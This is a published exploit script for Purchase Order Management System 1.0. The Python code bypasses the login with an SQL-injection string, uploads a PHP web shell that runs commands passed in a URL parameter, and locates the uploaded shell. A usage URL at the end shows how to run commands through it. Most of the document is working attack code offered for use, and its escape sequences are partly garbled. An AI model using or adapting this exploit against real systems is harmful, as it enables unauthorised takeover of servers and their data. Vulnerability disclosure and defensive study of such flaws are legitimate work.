Authored by Aryan Chehreghani

Purchase Order Management System version 1.0 suffers from a remote shell upload vulnerability.

# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload
# Date: 2021-09-14 
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
# Version: v1.0
# Tested on: Windows 10 - XAMPP Server 

# [ About the Purchase Order Management System ] :
#This Purchase Order Management System can store the list of all company's,
#suppliers for easily retrieving the suppliers' data upon generating the purchase order.
#It also stores the list of Items that the company possibly purchased from their suppliers.
#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. 
#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.

#!/bin/env python3
import requests
import time
import sys
from colorama import Fore, Style
if len(sys.argv) !=2:
        print ('''
###########################################################                                         
#Purchase Order Management System 1.0 - Remote File Upload#
#                  BY:Aryan Chehreghani                   #
#        Team:TAPESH DIGITAL SECURITY TEAM IRAN           #
#             mail:[email protected]            #  
#          -+-USE:python script.py <target url>           # 
#       [+]Example:python3 script.py http://127.0.0.1/    #
###########################################################
''')
else:
    try:
        url = sys.argv[1]
        print()
        print('[*] Trying to login...')
        time.sleep(1)
        login = url + '/classes/Login.php?f=login'
        payload_name = "shell.php"
        payload_file = r"""<?php @system($_GET['tapesh']); ?>"""
        session = requests.session()
        post_data = {"username": "'=''or'", "password": "'=''or'"}
        user_login = session.post(login, data=post_data)
        cookie = session.cookies.get_dict()

        if user_login.text == '{"status":"success"}':
            print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')
            upload_url = url + "/classes/Users.php?f=save"
            cookies = cookie
            headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------221231088029122460852571642112", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/leave_system/admin/?page=user"}
            data = "-----------------------------221231088029122460852571642112rnContent-Disposition: form-data; name="id"rnrn1rn-----------------------------221231088029122460852571642112rnContent-Disposition: form-data; name="firstname"rnrnAdminstratorrn-----------------------------221231088029122460852571642112rnContent-Disposition: form-data; name="lastname"rnrnAdminrn-----------------------------221231088029122460852571642112rnContent-Disposition: form-data; name="username"rnrnadminrn-----------------------------221231088029122460852571642112rnContent-Disposition: form-data; name="password"rnrnrn-----------------------------221231088029122460852571642112rnContent-Disposition: form-data; name="img"; filename="" + payload_name +""rnContent-Type: application/x-phprnrnn " + payload_file + "nnrn-----------------------------221231088029122460852571642112--rn"
            print('[*] Trying to shell...')
            time.sleep(2)

            try:
                print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')
                upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)
                upload_check = f'{url}/uploads'
                r = requests.get(upload_check)
                if payload_name in r.text:

                    payloads = r.text.split('<a href="')
                    for load in payloads:

                        if payload_name in load:
                            payload = load.split('"')
                            payload = payload[0]
                        else:
                            pass
                else:
                    exit()

            except:
                print ("Upload failed try againn")
                exit()

            try:
                print("Check Your Target ;)n")


            except:
                print("Failed to find shelln")

        else:
            print("Login failed!n")

    except:
        print("Something Went Wrong!n")

#########################################################
#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir

RELATED ARTICLESMORE FROM AUTHOR